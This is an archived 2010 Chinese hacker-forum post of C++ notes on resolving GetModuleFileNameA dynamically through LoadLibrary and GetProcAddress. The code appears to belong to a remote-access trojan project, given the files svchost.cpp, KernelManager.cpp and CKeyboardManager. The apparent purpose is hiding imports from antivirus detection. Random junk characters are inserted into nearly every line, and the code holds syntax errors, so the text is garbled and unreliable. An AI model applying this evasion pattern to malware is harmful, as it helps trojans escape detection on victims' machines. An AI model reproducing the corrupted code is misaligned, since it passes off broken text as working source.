【3.A.S.T】网络安全爱好者's Archiver

黑客学习

ice_xke 发表于 2010-10-19 12:30

全局动态调用

全局动态调用笔记
0N{c9q(lP![ Z svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.hO3K i yr
----------------------------------------;~P'i%`7Ft
DTDY.h:K)V8CHZ%Q0V
D9u@pb\or|
#if _MSC_VER>1000
y3Y/?K[.G4@ \w/q:h #pragma once
)Q:L,L&F;T;M-kX4v #endif //_MSC_VER>1000
8_8w)bH2u jyM4pad'X #include<windows.h>
8h)C)Bun5S,a[3P*K
2J I,uu}DF typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
*pfmv/S X]7y^ F+fz class DTDY
H IBjaY5Pzu@8t {ebH*W!`,^
public:O9DF\j
DTDY();^(G%pxWJ%Mh
virtual ~DTDY();;W+v+G*NN$S$r? Z v2a
public:
/n3L7b*ev [| static pGetModuleFileNameA MyGetModuleFileName;l#k,n0n&`c5^(o
static BOOL FunInitiallization();E r,K!n Y&X
}; WS&L/n|:e(Dc
#endif
wV#]eru ----------------------------------------
~F&h$r }
8q,v@*aA,KG DTDY.cpp:
J0bi4W y6Q"U
9Ci,qYQ%yfh5\O #include "DTDY.h"
-LH^)W O#_/G/U8q pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
cN5s1R5L+@ mN*W DTDY:TDY()
+Z0SvVzu%r {P"]^?X[
}
[O,ZH_.XZ b&}:~ DTDY::~DTDY()%DYc/_2_,S[2A
{P)H4j,} L@z
}
s(D RWd:k6B8T}-d bD BOOL DTDY::FunInitiallization())f;hU dYi*l2l1L
{
%S$c'@Rs},Q4? HMODULE hModule=LoadLibrary("kernel32.dll");5_7D$r"zP S#];G
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
^ L9AVIap:W,_ B if(!MyGetModuleFileName=) return FALSE;
.lWIm;_,h h"lsN"Sc[T
return TRUE;
9uMe.xD }
N.a!re DdDE*{.] ----------------------------------------
2f8_wMzKX qq svchost.cpp:O%O @;iMOb {
8cg9k-w9TL
#include "DTDY.h"
6~B*R E5b5? V`
.b;g6\k-J BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)6AuD#D,X$`
{BG kyK%p(`5{
switch(ul_reason_for_call)
]3~ [&j/k1|2vz'V%I {
z*M+N+[{1pJ case DLL_PROCESS_ATTACH:-dZ*^#yXSnp5e
if(!DTDY::FunInitiallization()) return FALSE;
{PB [M)F2v"z'L!cb7m
g%U#u$d| |$o#] N7t;j break;
F5tr3C9MC&J }U&We0[zf|
}
'FJaG?&b'w~3w (l j!s&xQt#p
5y$XX] vww(yi(b&u
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto defB'I$gxO0rE
改写为
0}j2SAE9KH DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
js0XZ%r4I&XS ----------------------------------------E2HK SG&c
KernelManager.cpp: PO7O@ Q4t-{fMLk
e/z3M J#i1x(b
#include "../DTDY.h"
kOhv7Y:M GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
{Z eYWe'O O{ 改写为'kN nY0g1y9L;?2Z5B
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));By;XP}:j(qN&}
----------------------------------------

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.